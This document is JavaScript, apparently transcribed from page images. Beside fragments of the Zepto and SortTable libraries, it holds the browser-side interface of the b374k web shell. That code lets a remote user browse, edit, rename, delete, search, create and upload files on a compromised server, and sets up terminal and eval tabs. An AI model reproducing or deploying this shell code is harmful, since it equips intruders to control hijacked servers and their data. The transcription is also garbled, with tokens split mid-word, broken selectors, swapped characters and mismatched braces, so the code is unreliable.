rseArguments.apply(null, arguments); return e.type = "POST", $.ajax(e)}, $.getJSON = function (a, b, c
) { var d = parseArguments.apply(null, arguments); return d.dataType = "json", $.ajax(d)}, $.fn.load =
function (a, b, c) { if (!this.length) return this; var d = this, e = a.split(/ \ /), f, g = parseArguments(a
, b, c), h = g.success; return e.length > 1 && (g.url = e[0], f = e[1]), g.success = function (a) { d.html(f ? ("
<div >").html(a.replace(rscript, "")) .find(f) : a), h && h.apply(d, arguments)}, $.ajax(g), this; var
escape = encodeURIComponent; $.param = function (a, b) { var c = []; return c.add = function (a, b) { this.p
ush(escape(a) + "=" + escape(b)) }, serialize(c, a, b), c.join("&").replace(/%20/g, "+")} (Zepto), fun
ction (a) { a.fn.serializeArray = function () { var b = [], c; return a([] .slice.call(this.get(0).elemen
ts)).each(function () { c = a(this); var d = c.attr("type"); this.nodeName.toLowerCase() !== "fieldset
" && !this.disabled && d !== "submit" && d !== "reset" && d !== "button" && (d !== "radio" && d !== "checkbox" || this.c
hecked) && b.push({name: c.attr("name"), value: c.val()})}), b}, a.fn.serialize = function () { var a = [
]; return this.serializeArray().forEach(function (b) { a.push(encodeURIComponent(b.name) + "=" + en
codeURIComponent(b.value))}), a.join("&"), a.fn.submit = function (b) { if (b) this.bind("submit", b
); else if (this.length) { var c = a.Event("submit"); this.eq(0).trigger(c), c.isDefaultPrevented()
|| this.get(0).submit() } return this } (Zepto), function (a) { "__proto__" in {} || a.extend(a.zepto, {
Z: function (b, c) { return b = b || [], a.extend(b, a.fn), b.selector = c || "", b.__Z = !0, b, isZ: function (b
) { return a.type(b) === "array" && "__Z" in b } }); try { getComputedStyle(undefine) } catch (b) { var c = g
etComputedStyle; window.getComputedStyle = function (a) { try { return c(a) } catch (b) { return null } }
} (Zepto)
```

```
/**
 *
 * SortTable
 * version 2
 * 7th April 2007
 * Stuart Langridge, http://www.kryogenix.org/code/browser/sorttable/
 */
var h=!0,j=!1;
sorttable={e:function(){arguments.callee.i||(arguments.callee.i=h,k&&clearInterval(k),document.createElement&&document.getElementsByTagName&&(sorttable.a=/^\d\d?\[\.\.?\]\d\d?\[\.\.?\]\d\d?\d\d$/),l=document.getElementsByTagName("table"),function(a){-1!=a.className.search(/bsortable\b/)&&sorttable.k(a)}}),k:function(a){0==a.getElementsByTagName("thead").length&&(thead=document.createElement("thead"),thead.appendChild(a.rows[0]),a.insertBefore(thead,a.firstChild));null==a.tHead&&(a.tHead=a.getElementsByTagName("thead")[0]);if(1==a.tHead.rows.length){sortbottomrows=[];for(var b=0;b<a.rows.length;b++)-1!=a.rows[b].className.search(/bsortbottom\b/)&&(sortbottomrows[sortbottomrows.length]=a.rows[b]);if(sortbottomrows){null==a.tFoot&&(tfoot=document.createElement("tfoot"),tfoot.appendChild(a.rows[0].cells);for(b=0;b<sortbottomrows.length;b++)tfoot.appendChild(sortbottomrows[b]);delete sortbottomrows}theadrow=a.tHead.rows[0].cells;for(b=0;b<theadrow.length;b++)if(!theadrow[b].className.match(/bsortable_nosort\b/)){(mtch=theadrow[b].className.match(/bsortable_(\d+)?\b/))&&(override=mtch[1]);theadrow[b].p=mtch&&"function"==typeof sorttable["sort_"+override]?sorttable["sort_"+override]:sorttable.j(a,b);theadrow[b].o=b;theadrow[b].c=a.tBodies[0];var c=theadrow[b],e=sorttable.q=function(){if(-1!=this.className.search(/bsortable_sorted\b/))sorttable.reverse(this.c),this.className=this.className.replace("sortable_sorted","sortable_sorted_reverse"),this.removeChild(document.getElementById("sortable_sortfwdind")),sortrevind=document.createElement("span"),sortrevind.id="sortable_sortrevind",sortrevind.innerHTML="&nbsp;&#x25B4;",this.appendChild(sortrevind);else if(-1!=this.className.search(/bsortable_sorted_reverse\b/))sorttable.reverse(this.c),this.className=this.className.replace("sortable_sorted_reverse","sortable_sorted"),this.removeChild(document.getElementById("sortable_sortrevind")),sortfwdind=document.createElement("span"),sortfwdind.id="sortable_sortfwdind",sortfwdind.innerHTML="&nbsp;&#x25BE;",this.appendChild(sortfwdind);else{theadrow=this.parentNode;l(theadrow.childNodes,function(a){1==a.nodeType&&(a.className=a.className.replace("sortable_sorted_reverse",""),a.className=a.className.replace("sortable_sorted",""))});(sortfwdind=document.getElementById("sortable_sortfwdind"))&&sortfwdind.parentNode.removeChild(sortfwdind);(sortrevind=document.getElementById("sortable_sortrevind"))&&sortrevind.parentNode.removeChild(sortrevind);this.className+=" sortable_sorted";sortfwdind=document.createElement("span");sortfwdind.id="sortable_sortfwdind";sortfwdind.innerHTML="&nbsp;&#x25BE;";this.appendChild(sortfwdind);row_array=[];col=this.o;rows=this.c.rows;for(var a=0;a<rows.length;a++)row_array[row_array.length]=[sorttable.d(rows[a].cells[col]),rows[a]];row_array.sort(this.p);tbody=this.c;for(a=0;a<row_array.length;a++)tbody.appendChild(row_array[a][1]);delete row_array}};if(c.addEventListener)c.addEventListener("click",e,j);else(e.f||(e.f=n++);c.b||(c.b={});var g=c.b.click;g||(g=c.b.click={},c.onclick&&(g[0]=c.onclick));g[e.f]=e;c.onclick=p}}},j:function(a,b){sortfn=sorttable.l;for(var c=0;c<a.tBodies[0].rows.length;c++)if(text=sorttable.d(a.tBodies[0].rows[c].cells[b]),"!"=text){if(text.match(/^-?[\u00a3\u00a4]?[\d,]+\%?$/))return sorttable.n;if(possdate=text.match(sorttable.a)){first=parseInt(possdate[1]);second=parseInt(possdate[2]);if(12<first)return sorttable.g;if(12<second)return sorttable.m;sortfn=sorttable.g}return sortfn},d:function(a){if(!a)return"";hasInputs="function"==typeof a.getElementsByTagName&&a.getElementsByTagName("input").length;if("!"=a.title)return a.title;if("undefined"!=typeof a.textContent&&!hasInputs)return a.textContent.replace(/^\s+|\s+$/g,"");if("undefined"!=typeof a.innerText&&!hasInputs)return a.innerText.replace(/^\s+|\s+$/g,"");if("undefined"!=typeof a.text&&!hasInputs)return a.text.replace(/^\s+|\s+$/g,"");switch(a.nodeType){case 3:if("input"==a.nodeName.toLowerCase())return a.value.replace(/^\s+|\s+$/g,"");case 4:return a.nodeValue.replace(/^\s+|\s+$/g,"");case 1:case 11:for(var b="",c=0;c<a.childNodes.length;c++)b+=sorttable.d(a.childNodes[c]);return b.replace(/^\s+|\s+$/g,"");default:return""}},reverse:function(a){newrows=[];for(var b=0;b<a.rows.length;b++)newrows[newrows.length]=a.rows[b];for(b=newrows.length-1;0<=b;b--)a.appendChild(newrows[b]);delete newrows},n:function(a,b){aa=parseFloat(a[0].replace(/[\^0-9.-]/g,""));isNaN(aa)&&(aa=0);bb=parseFloat(b[0].replace(/[\^0-9.-]/g,""));isNaN(bb)&&(bb=0);return aa-bb},l:function(a,b){return a[0].toLowerCase()<b[0].toLowerCase()?0:a[0].toLowerCase()<b[0].toLowerCase()?-1:1},g:function(a,b){mtch=a[0].match(sorttable.a);y=mtch[3];m=mtch[2];d=mtch[1];1==m.length&&(m="0"+m);1==d.length&&(d="0"+d);dt1=y+m+d;mtch=b[0].match(sorttable.a);y=mtch[3];m=mtch[2];d=mtch[1];1==m.length&&(m="0"+m);1==d.length&&(d="0"+d);dt2=y+m+d;return dt1==dt2?0:dt1<dt2?-1:1},m:function(a,b){mtch=a[0].match(sorttable.a);y=mtch[3];d=mtch[2];m=mtch[1];1==m.length&&(m="0"+m);1==d.length&&(d="0"+d);dt1=y+m+d;mtch=b[0].match(sorttable.a);y=mtch[3];d
```

```
=mtch[2];m=mtch[1];l==m.length&&(m="0"+m);l==d.length&&
(d="0"+d);dt2=y+m+d;return dt1==dt2?0:dt1<dt2?-1:1},r:function(a,b){for(var c=0,e=a.length-
1,g=h;g;) {for(var g=j,f=c;f<e;++f)0<b(a[f],a[f+1])&&(g=a[f],a[f]=a[f+1],a[f+1]=g,g=h);e--;i
f(!g)break;for(f=e;f>c;--f)0>b(a[f],a[f-1])&&(g=a[f],a[f]=a[f-1],a[f-1]=g,g=h);c++}};docum
ent.addEventListener&&document.addEventListener("DOMContentLoaded",sorttable.e,j);if(/WebKi
t/i.test(navigator.userAgent))var k=setInterval(function(){/loaded|complete/.test(document.
readyState)&&sorttable.e()},10);
window.onload=sorttable.e;var n=1;function p(a){var b=h;a|| (a=((this.ownerDocument||this.do
cument||this).parentWindow||window).event,a.preventDefault=q,a.stopPropagation=r);var c=thi
s.b[a.type],e;for(e in c)this.h=c[e],this.h(a)===j&&(b=j);return b}function q(){this.return
Value=j}function r(){this.cancelBubble=h}Array.forEach||(Array.forEach=function(a,b,c){for(
var e=0;e<a.length;e++)b.call(c,a[e],e,a)});
Function.prototype.forEach=function(a,b,c){for(var e in a)"undefined"==typeof this.prototyp
e[e]&&b.call(c,a[e],e,a)};String.forEach=function(a,b,c){Array.forEach(a.split(""),function
(e,g){b.call(c,e,g,a)});function l(a,b){if(a){var c=Object;if(a instanceof Function)c=Func
tion;else{if(a.forEach instanceof Function){a.forEach(b,void 0);return}"string"==typeof a?c
=String:"number"==typeof a.length&&(c=Array)}c.forEach(a,b,void 0)}};
```

```
var loading_count = 0;
var running = false;
var defaultTab = 'explorer';
var currentTab = $('#'+defaultTab);
var tabScroll = new Object;
var onDrag = false;
var onScroll = false;
var scrollDelta = 1;
var scrollCounter = 0;
var scrollSpeed = 60;
var scrollTimer = '';
var dragX = '';
var dragY = '';
var dragDeltaX = '';
var dragDeltaY = '';
var editSuccess = '';
var terminalHistory = new Array();
var terminalHistoryPos = 0;
var evalSupported = "";
var evalReady = false;
var resizeTimer = '';
var portableWidth = 700;
var portableMode = null;
```

```
Zepto(function($){
  if(init_shell){
    var now = new Date();
    output("started @ "+now.toGMTString());
    output("cwd : "+get_cwd());
    output("module : "+module_to_load);

    show_tab();
    xpl_bind();
    eval_init();

    window_resize();

    xpl_update_status();

    $(window).on('resize', function(e){
      clearTimeout(resizeTimer);
      resizeTimer = setTimeout("window_resize()", 1000);
    });

    $('.menuitem').on('click', function(e){
      selectedTab = $(this).attr('href').substr(2);
      show_tab(selectedTab);
    });

    $('#logout').on('click', function(e){
```

```
    var cookie = document.cookie.split(';');
    for(var i=0; i<cookie.length; i++){
        var entries = cookie[i], entry = entries.split("="), name =
entry[0];
        document.cookie = name + "="; expires=Thu, 01 Jan 1970 00:
00:01 GMT; path="/";
    }
    localStorage.clear();
    location.href = targeturl;
});

$('#totop').on('click', function(e){
    $(window).scrollTop(0);
});
$('#totop').on('mouseover', function(e){
    onScroll = true;
    clearTimeout(scrollTimer);
    start_scroll('top');
});
$('#totop').on('mouseout', function(e){
    onScroll = false;
    scrollCounter = 0;
});
$('#tobottom').on('click', function(e){
    $(window).scrollTop($(document).height()-$(window).height());
});
$('#tobottom').on('mouseover', function(e){
    onScroll = true;
    clearTimeout(scrollTimer);
    start_scroll('bottom');
});
$('#tobottom').on('mouseout', function(e){
    onScroll = false;
    scrollCounter = 0;
});
$('#basicInfo').on('mouseenter', function(e){
    $('#toggleBasicInfo').show();
});
$('#basicInfo').on('mouseleave', function(e){
    $('#toggleBasicInfo').hide();
});
$('#toggleBasicInfo').on('click', function(e){
    $('#basicInfo').hide();
    $('#showinfo').show();
    $('#toggleBasicInfo').hide();
    localStorage.setItem('infoBarShown', 'hidden');
});
$('#showinfo').on('click', function(e){
    $('#basicInfo').show();
    $('#showinfo').hide();
    localStorage.setItem('infoBarShown', 'shown');
});

if((infoBarShown = localStorage.getItem('infoBarShown'))){
    if(infoBarShown=='shown'){
        $('#basicInfo').show();
        $('#showinfo').hide();
    }
    else{
        $('#basicInfo').hide();
        $('#showinfo').show();
        $('#toggleBasicInfo').hide();
    }
}
else{
    info_refresh();
}
```

```
        if(history.pushState){
            window.onpopstate = function(event) { refresh_tab(); };
        }
        else{
            window.historyEvent = function(event) { refresh_tab(); };
        }
    }
});

function output(str){
    console.log('b374k> '+str);
}

function window_resize(){
    bodyWidth = $('body').width();
    if(bodyWidth<=portableWidth){
        layout_portable();
    }
    else{
        layout_normal();
    }
}

function layout_portable(){
    nav = $('#nav');
    menu = $('#menu');
    headerNav = $('#headerNav');
    content = $('#content');

    //nav.hide();
    nav.prependTo('#content');
    nav.css('padding','5px 8px');
    nav.css('margin-top','8px');
    nav.css('display','block');
    nav.addClass('border');

    menu.children().css('width','100%');
    menu.hide();
    $('#menuButton').remove();
    headerNav.prepend("<div id='menuButton' class='boxtitle' onclick=\"\$('#menu').toggle();\" style='float:left;display:inline;padding:4px 8px;margin-right:8px;'>menu</div>");
    menu.attr('onclick','"\$('#menu').hide();"');

    $('#xplTable tr>:nth-child(4)').hide();
    $('#xplTable tr>:nth-child(5)').hide();
    if(!win){
        $('#xplTable tr>:nth-child(6)').hide();
    }

    tbltfoot = $('#xplTable tfoot td:last-child');
    if(tbltfoot[0]) tbltfoot[0].colSpan = 1;
    if(tbltfoot[1]) tbltfoot[1].colSpan = 2;

    $('.box').css('width','100%');
    $('.box').css('height','100%');
    $('.box').css('left','0px');
    $('.box').css('top','0px');

    paddingTop = $('#header').height();
    content.css('padding-top',paddingTop+'px');

    portableMode = true;
}

function layout_normal(){
    nav = $('#nav');
    menu = $('#menu');
```

```
content = $('#content');

nav.insertAfter('#b374k');
nav.css('padding','0');
nav.css('margin-top','0');
nav.css('display','inline');
nav.removeClass('border');

menu.children().css('width','auto');
menu.show();
$('#menuButton').remove();
menu.attr('onclick','');

$('#xplTable tr>:nth-child(4)').show();
$('#xplTable tr>:nth-child(5)').show();
if(!win){
    $('#xplTable tr>:nth-child(6)').show();
    colspan = 4;
}
else colspan = 3;

tbltfoot = $('#xplTable tfoot td:last-child');
if(tbltfoot[0]) tbltfoot[0].colSpan = colspan;
if(tbltfoot[1]) tbltfoot[1].colSpan = colspan+1;

paddingTop = $('#header').height();
content.css('padding-top',paddingTop+'px');

portableMode = false;
}

function start_scroll(str){
    if(str=='top'){
        to = $(window).scrollTop() - scrollCounter;
        scrollCounter = scrollDelta + scrollCounter;
        if(to<=0){
            to = 0;
            onScroll = false;
        }
        else if(onScroll){
            scrollTimer = setTimeout("start_scroll('top')", scrollSpeed);
            $(window).scrollTop(to);
        }
    }
    else if(str=='bottom'){
        to = $(window).scrollTop() + scrollCounter;
        scrollCounter = scrollDelta + scrollCounter;
        bottom = $(document).height()-$(window).height();
        if(to>=bottom){
            to = bottom;
            onScroll = false;
        }
        else if(onScroll){
            scrollTimer = setTimeout("start_scroll('bottom')", scrollSpeed);
            $(window).scrollTop(to);
        }
    }
}

function get_cwd(){
    return decodeURIComponent(get_cookie('cwd'));
}

function fix_tabchar(el, e){
    if(e.keyCode==9){
        e.preventDefault();
        var s = el.selectionStart;
        el.value = el.value.substring(0,el.selectionStart) + "\t" + el.value.substr
```

```
ing(el.selectionEnd);
    el.selectionEnd = s+1;
}
}

function get_cookie(key){
    var res;
    return (res = new RegExp('(?:^|; )' + encodeURIComponent(key) + '=([^;]*)').exec(document.cookie)) ? (res[1]) : null;
}

function set_cookie(key, value){
    document.cookie = key + '=' + encodeURIComponent(value);
}

function html_safe(str){
    if(typeof(str) == "string"){
        str = str.replace(/&/g, "&amp;");
        str = str.replace(/"/g, "&quot;");
        str = str.replace(/'/g, "&#039;");
        str = str.replace(/</g, "&lt;");
        str = str.replace(/>/g, "&gt;");
    }
    return str;
}

function ucfirst(str){
    return str.charAt(0).toUpperCase() + str.slice(1);
}

function time(){
    var d = new Date();
    return d.getTime();
}

function send_post(targetdata, callback, loading){
    if(loading==null) loading_start();
    $.ajax({
        url: targeturl,
        type: 'POST',
        data: targetdata,
        success: function(res){
            callback(res);
            if(loading==null) loading_stop();
        },
        error: function(){ if(loading==null) loading_stop(); }
    });
}

function loading_start(){
    if(!running){
        $('#overlay').show();
        running = true;
        loading_loop();
    }
}

function loading_loop(){
    if(running){
        img = $('#loading');
        img.css('transform', 'rotate('+loading_count+'deg)');
        img.css('-ms-transform', 'rotate('+loading_count+'deg)');
        img.css('-webkit-transform', 'rotate('+loading_count+'deg)');

        loading_count+=7;
        if(loading_count>360) loading_count = 0;
        if(running) setTimeout("loading_loop()",20);
    }
}
```



```
}

function loading_stop(){
    if(running){
        img = $('#loading');
        img.css('transform', 'rotate(0deg)');
        img.css('-ms-transform', 'rotate(0deg)');
        img.css('-webkit-transform', 'rotate(0deg)');

        $('#overlay').hide();
        running = false;
    }
}

function show_tab(id){
    if(!id){
        if(location.hash!='') id = location.hash.substr(2);
        else id = defaultTab;
    }
    refresh_tab(id);
}

function refresh_tab(id){
    if(!id){
        if(location.hash!='') id = location.hash.substr(2);
        else id = defaultTab;
    }
    $('#menuItemSelected').removeClass("menuItemSelected");
    $('#menu'+id).addClass("menuItemSelected");

    tabScroll[currentTab.attr('id')] = $(window).scrollTop();
    currentTab.hide();
    currentTab = $('#'+id);
    currentTab.show();
    window[id]();
    if(tabScroll[id]){
        $(window).scrollTop(tabScroll[id]);
    }
    hide_box();
}

function trap_enter(e, callback){
    if(e.keyCode==13){
        if(callback!=null) window[callback]();
    }
}

function show_box(title, content){
    onDrag = false;
    hide_box();
    box = "<div class='box'><p class='boxtitle'>"+title+"<span class='boxclose floatRig
ht'>x</span></p><div class='boxcontent'>"+content+"</div><div class='boxresult'></div></div
>";
    $('#content').append(box);

    box_width = $('.box').width();
    body_width = $('body').width();

    box_height = $('.box').height();
    body_height = $('body').height();

    x = (body_width - box_width)/2;
    y = (body_height - box_height)/2;
    if(x<0 || portableMode) x = 0;
    if(y<0 || portableMode) y = 0;
    if(portableMode){
        $('.box').css('width', '100%');
        $('.box').css('height', '100%');
    }
}
```

```
    }

    $('.box').css('left', x+'px');
    $('.box').css('top', y+'px');

    $('.boxclose').on('click', function(e){
        hide_box();
    });

    if(!portableMode){
        $('.boxtitle').on('click', function(e){
            if(!onDrag){
                dragDeltaX = e.pageX - parseInt($('.box').css('left'));
                dragDeltaY = e.pageY - parseInt($('.box').css('top'));
                drag_start();
            }
            else drag_stop();
        });
    }

    $(document).off('keyup');
    $(document).on('keyup', function(e){
        if(e.keyCode == 27) hide_box();
    });

    if($('.box input')[0]) $('.box input')[0].focus();
}

function hide_box(){
    $(document).off('keyup');
    $('.box').remove();
}

function drag_start(){
    if(!onDrag){
        onDrag = true;
        $('body').off('mousemove');
        $('body').on('mousemove', function(e){
            dragX = e.pageX;
            dragY = e.pageY;
        });
        setTimeout('drag_loop()', 50);
    }
}

function drag_loop(){
    if(onDrag){
        x = dragX - dragDeltaX;
        y = dragY - dragDeltaY;
        if(y<0)y=0;
        $('.box').css('left', x+'px');
        $('.box').css('top', y+'px');
        setTimeout('drag_loop()', 50);
    }
}

function drag_stop(){
    onDrag = false;
    $('body').off('mousemove');
}

function get_all_cbox_selected(id, callback){
    var buffer = new Array();
    $('#'+id).find('.cBoxSelected').not('.cBoxAll').each(function(i){
        if((href = window[callback]($(this)))){
            buffer[i] = href;
        }
    });
}
```

```
        return buffer;
    }

function cbox_bind(id, callback){
    $('#'+id).find('.cBox').off('click');
    $('#'+id).find('.cBoxAll').off('click');

    $('#'+id).find('.cBox').on('click', function(e){
        if($(this).hasClass('cBoxSelected')){
            $(this).removeClass('cBoxSelected');
        }
        else $(this).addClass('cBoxSelected');
        if(callback!=null) window[callback]();
    });
    $('#'+id).find('.cBoxAll').on('click', function(e){
        if($(this).hasClass('cBoxSelected')){
            $('#'+id).find('.cBox').removeClass('cBoxSelected');
            $('#'+id).find('.cBoxAll').removeClass('cBoxSelected');
        }
        else{
            $('#'+id).find('.cBox').not('.cBoxException').addClass('cBoxSelected');
            $('#'+id).find('.cBoxAll').not('.cBoxException').addClass('cBoxSelected');
        }
        if(callback!=null) window[callback]();
    });
}

function action(path, type){
    title = "Action";
    content = '';
    if(type=='file') content = "<table class='boxtbl'><tr><td><input type='text' value='"+path+"' disabled></td></tr><tr data-path='"+path+"'><td><span class='edit button'>edit</span><span class='ren button'>rename</span><span class='del button'>delete</span><span class='dl button'>download</span></td></tr></table>";
    if(type=='dir') content = "<table class='boxtbl'><tr><td><input type='text' value='"+path+"' disabled></td></tr><tr data-path='"+path+"'><td><span class='find button'>find</span><span class='ul button'>upload</span><span class='ren button'>rename</span><span class='del button'>delete</span></td></tr></table>";
    if(type=='dot') content = "<table class='boxtbl'><tr><td><input type='text' value='"+path+"' disabled></td></tr><tr data-path='"+path+"'><td><span class='find button'>find</span><span class='ul button'>upload</span><span class='ren button'>rename</span><span class='del button'>delete</span><span class='newfile button'>new file</span><span class='newfolder button'>new folder</span></td></tr></table>";
    show_box(title, content);
    xpl_bind();
}

function navigate(path, showfiles){
    if(showfiles==null) showfiles = 'true';
    send_post({ cd:path, showfiles:showfiles }, function(res){
        if(res!='error'){
            splits = res.split('{{|b374k|}}');
            if(splits.length==3){
                $('#nav').html(splits[1]);
                if(showfiles=='true'){
                    $('#explorer').html('');
                    $('#explorer').html(splits[2]);
                    sorttable.k($('#xplTable').get(0));
                }
                $('#terminalCwd').html(html_safe(get_cwd())+'&gt;');
                xpl_bind();
                window_resize();
            }
        }
    });
}
```

```

    });
}

function view(path, type, preserveTimestamp){
    if(preserveTimestamp==null) preserveTimestamp = 'true';
    send_post({ viewFile: path, viewType: type, preserveTimestamp:preserveTimestamp },
function(res){
    if(res!='error'){
        $('#explorer').html('');
        $('#explorer').html(res);
        xpl_bind();
        show_tab('explorer');
        if((type=='edit') || (type=='hex')){
            editResult = (type=='edit')? $('#editResult'):$('#editHexRe
sult');

            if(editSuccess=='success'){
                editResult.html(' ( File saved )');
            }
            else if(editSuccess=='error'){
                editResult.html(' ( Failed to save file )');
            }
            editSuccess = '';
        }
        cbox_bind('editTbl');
    }
});
}

function view_entry(el){
    if($(el).attr('data-path')!=''){
        entry = $(el).attr('data-path');
        $('#form').append("<input type='hidden' name='viewEntry' value='"+entry+"'>
");
        $('#form').submit();
        $('#form').html('');
    }
}

function ren(path){
    title = "Rename";
    content = "<table class='boxtbl'><tr><td class='colFit'>Rename to</td><td><input ty
pe='text' class='renameFileTo' value='"+path+"' onkeydown=\"trap_enter(event, 'ren_go');\"
><input type='hidden' class='renameFile' value='"+path+"'></td></tr><tr><td colspan='2'><sp
an class='button' onclick='ren_go();'>rename</span></td></tr></table>";
    show_box(title, content);
}

function ren_go(){
    renameFile = $('#.renameFile').val();
    renameFileTo = $('#.renameFileTo').val();
    send_post({renameFile:renameFile, renameFileTo:renameFileTo}, function(res){
        if(res!='error'){
            navigate(res);
            $('#.boxresult').html('Operation(s) succeeded');
            $('#.renameFile').val($('#.renameFileTo').val());
        }
        else $('#.boxresult').html('Operation(s) failed');
    });
}

function newfolder(path){
    title = "New Folder";
    path = path + 'newfolder-' + time();
    content = "<table class='boxtbl'><tr><td class='colFit'>Folder Name</td><td><input
type='text' class='newFolder' value='"+path+"' onkeydown=\"trap_enter(event, 'newfolder_go
');\"></td></tr><tr><td colspan='2'><span class='button' onclick='newfolder_go();'>create</s
pan></td></tr></table>";
    show_box(title, content);
}

```

```
}

function newfolder_go(){
    newFolder = $('newFolder').val();
    send_post({newFolder:newFolder}, function(res){
        if(res!='error'){
            navigate(res);
            $('boxresult').html('Operation(s) succeeded');
        }
        else $('boxresult').html('Operation(s) failed');
    });
}

function newfile(path){
    title = "New File";
    path = path + 'newfile-' + time();
    content = "<table class='boxtbl'><tr><td class='colFit'>File Name</td><td><input ty
pe='text' class='newFile' value='"+path+"' onkeydown=\"trap_enter(event, 'newfile_go');\"><
/td></tr><tr><td colspan='2'><span class='button' onclick='newfile_go();'>create</span></td>
</tr></table>";
    show_box(title, content);
}

function newfile_go(){
    newFile = $('newFile').val();
    send_post({newFile:newFile}, function(res){
        if(res!='error'){
            view(newFile, 'edit');
            $('boxresult').html('Operation(s) succeeded');
        }
        else $('boxresult').html('Operation(s) failed');
    });
}

function viewfileorfolder(){
    title = "View File / Folder";
    content = "<table class='boxtbl'><tr><td><input type='text' class='viewFileorFolder
' value='"+html_safe(get_cwd())+"' onkeydown=\"trap_enter(event, 'viewfileorfolder_go');\">
</td></tr><tr><td><span class='button' onclick='viewfileorfolder_go();'>view</span></td></tr>
</table>";
    show_box(title, content);
}

function viewfileorfolder_go(){
    entry = $('viewFileorFolder').val();
    send_post({viewFileorFolder:entry}, function(res){
        if(res!='error'){
            if(res=='file'){
                view(entry, 'auto');
                show_tab('explorer');
            }
            else if(res=='folder'){
                navigate(entry);
                show_tab('explorer');
            }
        }
    });
}

function del(path){
    title = "Delete";
    content = "<table class='boxtbl'><tr><td class='colFit'>Delete</td><td><input type=
'text' class='delete' value='"+path+"' onkeydown=\"trap_enter(event, 'delete_go');\"></td><
/tr><tr><td colspan='2'><span class='button' onclick='delete_go();'>delete</span></td></tr>
</table>";
    show_box(title, content);
}
```

```

function delete_go(){
    path = $(' .delete').val();
    send_post({delete:path}, function(res){
        if(res!='error'){
            navigate(res);
            $(' .boxresult').html('Operation(s) succeeded');
        }
        else $(' .boxresult').html('Operation(s) failed');
    });
}

function find(path){
    findfile = "<table class='boxtbl'><thead><tr><th colspan='2'><p class='boxtitle'>Find File</p></th></tr></thead><tbody><tr><td style='width:144px'>Search in</td><td><input type='text' class='findfilePath' value='"+path+"' onkeydown=\"trap_enter(event, 'find_go_file');\"></td></tr><tr><td style='border-bottom:none;'>Filename contains</td><td style='border-bottom:none;'><input type='text' class='findfileFilename' onkeydown=\"trap_enter(event, 'find_go_file');\"></td></tr><tr><td></td><td><span class='cBox findfileFilenameRegex'></span><span class='floatLeft'>Regex</span>&nbsp;&nbsp;&nbsp;<span class='cBox findfileFilenameInsensitive'></span><span class='floatLeft'>Case Insensitive</span></td></tr><tr><td style='border-bottom:none;'>File contains</td><td style='border-bottom:none;'><input type='text' class='findfileContains' onkeydown=\"trap_enter(event, 'find_go_file');\"></td></tr><tr><td></td><td><span class='cBox findfileContainsRegex'></span><span class='floatLeft'>Regex</span>&nbsp;&nbsp;&nbsp;<span class='cBox findfileContainsInsensitive'></span><span class='floatLeft'>Case Insensitive</span></td></tr><tr><td>Permissions</td><td><span class='cBox findfileReadable'></span><span class='floatLeft'>Readable</span>&nbsp;&nbsp;&nbsp;<span class='cBox findfileWritable'></span><span class='floatLeft'>Writable</span>&nbsp;&nbsp;&nbsp;<span class='cBox findfileExecutable'></span><span class='floatLeft'>Executable</span></td></tr><tr><td></td><td><span class='button navbar' data-path='"+path+"'>explorer</span></td><td><span class='button' onclick=\"find_go_file();\">find</span></td></tr><tr><td colspan='2' class='findfileResult'></td></tr></tbody></table>";
    findfolder = "<table class='boxtbl'><thead><tr><th colspan='2'><p class='boxtitle'>Find Folder</p></th></tr></thead><tbody><tr><td style='width:144px'>Search in</td><td><input type='text' class='findFolderPath' value='"+path+"' onkeydown=\"trap_enter(event, 'find_go_folder');\"></td></tr><tr><td style='border-bottom:none;'>Foldername contains</td><td style='border-bottom:none;'><input type='text' class='findFoldername' onkeydown=\"trap_enter(event, 'find_go_folder');\"></td></tr><tr><td></td><td><span class='cBox findFoldernameRegex'></span><span class='floatLeft'>Regex</span>&nbsp;&nbsp;&nbsp;&nbsp;<span class='cBox findFoldernameInsensitive'></span><span class='floatLeft'>Case Insensitive</span></td></tr><tr><td>Permissions</td><td><span class='cBox findReadable'></span><span class='floatLeft'>Readable</span>&nbsp;&nbsp;&nbsp;<span class='cBox findWritable'></span><span class='floatLeft'>Writable</span>&nbsp;&nbsp;&nbsp;<span class='cBox findExecutable'></span><span class='floatLeft'>Executable</span></td></tr><tr><td></td><td><span class='button navbar' data-path='"+path+"'>explorer</span></td><td><span class='button' onclick=\"find_go_folder();\">find</span></td></tr><tr><td colspan='2' class='findResult'></td></tr></tbody></table>";
    $(' #explorer').html("<div id='xplUpload'>" + findfile+'<br>' + findfolder+'</div>');
    cbox_bind('xplUpload');
}

function find_go_file(){
    find_go('file');
}

function find_go_folder(){
    find_go('folder');
}

function find_go(findType){
    findPath = (findType=='file')? $(' .findfilePath').val():$(' .findFolderPath').val();
    findResult = (findType=='file')? $(' .findfileResult'):$(' .findResult');

    findName = (findType=='file')? $(' .findfileFilename').val():$(' .findFoldername').val();
    findNameRegex = (findType=='file')? $(' .findfileFilenameRegex').hasClass('cBoxSelected').toString():$(' .findFoldernameRegex').hasClass('cBoxSelected').toString();
    findNameInsensitive = (findType=='file')? $(' .findfileFilenameInsensitive').hasClass('cBoxSelected').toString():$(' .findFoldernameInsensitive').hasClass('cBoxSelected').toString();
}

```

```

        findContent = (findType=='file')? $(' .findfileContains').val():"";
        findContentRegex = (findType=='file')? $(' .findfileContainsRegex').hasClass('cBoxSelected').toString():"";
        findContentInsensitive = (findType=='file')? $(' .findfileContainsInsensitive').hasClass('cBoxSelected').toString():"";

        findReadable = (findType=='file')? $(' .findfileReadable').hasClass('cBoxSelected').toString():$(' .findWritable').hasClass('cBoxSelected').toString();
        findWritable = (findType=='file')? $(' .findfileWritable').hasClass('cBoxSelected').toString():$(' .findReadable').hasClass('cBoxSelected').toString();
        findExecutable = (findType=='file')? $(' .findfileExecutable').hasClass('cBoxSelected').toString():$(' .findExecutable').hasClass('cBoxSelected').toString();

        send_post(
            {
                findType:findType,
                findPath:findPath,
                findName:findName,
                findNameRegex:findNameRegex,
                findNameInsensitive:findNameInsensitive,
                findContent:findContent,
                findContentRegex:findContentRegex,
                findContentInsensitive:findContentInsensitive,
                findReadable:findReadable,
                findWritable:findWritable,
                findExecutable:findExecutable
            },
            function(res){
                if(res!='error'){
                    findResult.html(res);
                }
            }
        );
    }

function ul_go_comp(){
    ul_go('comp');
}

function ul_go_url(){
    ul_go('url');
}

function ul(path){
